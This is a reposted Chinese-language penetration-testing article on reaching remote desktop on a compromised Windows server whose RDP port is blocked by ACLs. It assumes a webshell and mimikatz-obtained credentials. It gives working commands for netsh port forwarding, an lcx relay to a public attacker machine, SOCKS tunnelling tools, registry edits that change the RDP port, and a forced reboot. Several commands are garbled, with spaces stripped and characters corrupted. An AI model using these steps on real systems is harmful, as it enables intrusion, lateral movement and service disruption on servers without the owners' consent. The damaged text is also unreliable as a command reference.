本文转载自微信公众号《绕过》,作者绕过。转载本文请联系旁路公众号。假设一个场景:在Webshel??l中执行mimikatz获取win管理员密码,本地查看3389端口打开,但当前跳板机无法远程连接目标机。因为一个特定的需求,你必须远程登录到这个win服务器。你该怎么办?首先,我们来分析一下这个场景。端口已打开但无法连接。最有可能的情况是目标网段受到了ACL策略的影响。限制,只允许通过特定网段登录,比如堡垒机。大多数堡垒机部署时,为了不改变现有网络拓扑结构,采用旁路部署方案,通过ACL策略限制用户访问特定端口。那么,我们可以用另一种方式来描述这个问题:目标服务器的远程端口被ACL限制了,但是其他端口没有限制。然后,可以通过端口转发绕过最简单的解决方案。1、使用netsh命令进行端口转发Windows自带的netshnetsh实现端口转发,监听12345端口,转发到本地3389端口,可以绕过访问策略限制。#A。3389端口转发到12345端口。netshinterfaceportproxyaddv4tov4listenaddress=192.168.126.32listenport=12345connectaddress=192.168.126.32connectport=3389#B。查看配置的端口映射列表C:\Windows\ipp32>netshinterfaceportproxyshowv4tov4监听ipv4:AddressPortAddressPort------------------------------------------------192.168.126.3212345192.168.126.323389这样就可以通过攻击机跳板直接远程远程攻击目标机的12345端口机,并可实现远程登录。2、在目标机上执行LCX端口转发:lcx.exe-slave公网ip51内网ip3389在公网机上执行:lcx.exe–listen513340连接本机127.0.0.1:3340,就是这样连接到目标机器的3389。3、内网渗透工具SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等,使用SOCKS协议,使用Proxifier,可以用mstsc登录目标主机。4、修改Windows远程桌面端口通过修改Windows默认的远程桌面端口,可以绕过ACL策略的访问限制。修改注册表,命令如下:REGADD"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp"/v"PortNumber"/tREG_DWORD/d12345/fREGADD"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp"/v"PortNumber"/tREG_DWORD/d12345/f强制重启目标服务器后,注册表生效。shutdown-r-t0此时就可以登录远程目标服务器的12345了。